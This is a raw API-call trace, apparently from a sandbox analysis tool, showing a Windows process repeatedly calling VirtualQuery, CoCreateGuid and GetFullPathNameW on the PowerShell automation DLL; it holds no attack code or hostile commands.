	[0062.674] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.674] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.674] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.675] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x944c5994, Data2=0xb0ce, Data3=0x4596, Data4=([0]=0x8c, [1]=0xca, [2]=0xbb, [3]=0x44, [4]=0xb1, [5]=0xa8, [6]=0xb3, [7]=0xd6))) returned 0x0
	[0062.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.675] GetLastError () returned 0x0
	[0062.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.675] GetLastError () returned 0x0
	[0062.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.675] GetLastError () returned 0x0
	[0062.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.675] GetLastError () returned 0x0
	[0062.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.675] GetLastError () returned 0x0
	[0062.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.675] GetLastError () returned 0x0
	[0062.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.675] GetLastError () returned 0x0
	[0062.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.675] GetLastError () returned 0x0
	[0062.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.675] GetLastError () returned 0x0
	[0062.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.675] GetLastError () returned 0x0
	[0062.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.676] GetLastError () returned 0x0
	[0062.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.676] GetLastError () returned 0x0
	[0062.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.676] GetLastError () returned 0x0
	[0062.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.676] GetLastError () returned 0x0
	[0062.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.676] GetLastError () returned 0x0
	[0062.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.676] GetLastError () returned 0x0
	[0062.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.676] GetLastError () returned 0x0
	[0062.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.676] GetLastError () returned 0x0
	[0062.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.676] GetLastError () returned 0x0
	[0062.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.676] GetLastError () returned 0x0
	[0062.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.676] GetLastError () returned 0x0
	[0062.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.676] GetLastError () returned 0x0
	[0062.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.677] GetLastError () returned 0x0
	[0062.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.677] GetLastError () returned 0x0
	[0062.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.677] GetLastError () returned 0x0
	[0062.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.677] GetLastError () returned 0x0
	[0062.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.677] GetLastError () returned 0x0
	[0062.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.677] GetLastError () returned 0x0
	[0062.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.677] GetLastError () returned 0x0
	[0062.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.677] GetLastError () returned 0x0
	[0062.677] VirtualQuery (in: lpAddress=0xad390, lpBuffer=0xae390, dwLength=0x1c | out: lpBuffer=0xae390*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.678] GetLastError () returned 0x0
	[0062.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.678] GetLastError () returned 0x0
	[0062.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.678] GetLastError () returned 0x0
	[0062.678] VirtualQuery (in: lpAddress=0xad390, lpBuffer=0xae390, dwLength=0x1c | out: lpBuffer=0xae390*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.678] GetLastError () returned 0x0
	[0062.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.678] GetLastError () returned 0x0
	[0062.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.678] GetLastError () returned 0x0
	[0062.678] VirtualQuery (in: lpAddress=0xad390, lpBuffer=0xae390, dwLength=0x1c | out: lpBuffer=0xae390*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.679] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.679] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.680] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.680] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.681] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.681] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.681] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.681] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.682] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.682] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.683] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.683] VirtualQuery (in: lpAddress=0xad1cc, lpBuffer=0xae1cc, dwLength=0x1c | out: lpBuffer=0xae1cc*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.683] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.684] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.684] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.684] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.684] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x4fdbfdbe, Data2=0x7dc, Data3=0x45dc, Data4=([0]=0xb7, [1]=0x79, [2]=0x2e, [3]=0xd, [4]=0x26, [5]=0xba, [6]=0xf8, [7]=0xd1))) returned 0x0
	[0062.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.685] GetLastError () returned 0x0
	[0062.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.685] GetLastError () returned 0x0
	[0062.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.685] GetLastError () returned 0x0
	[0062.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.685] GetLastError () returned 0x0
	[0062.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.685] GetLastError () returned 0x0
	[0062.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.685] GetLastError () returned 0x0
	[0062.685] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x5cfa8942, Data2=0x5733, Data3=0x47ac, Data4=([0]=0x92, [1]=0xec, [2]=0x60, [3]=0x82, [4]=0x1a, [5]=0x31, [6]=0x61, [7]=0x2d))) returned 0x0
	[0062.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.685] GetLastError () returned 0x0
	[0062.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.685] GetLastError () returned 0x0
	[0062.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.685] GetLastError () returned 0x0
	[0062.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.685] GetLastError () returned 0x0
	[0062.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.686] GetLastError () returned 0x0
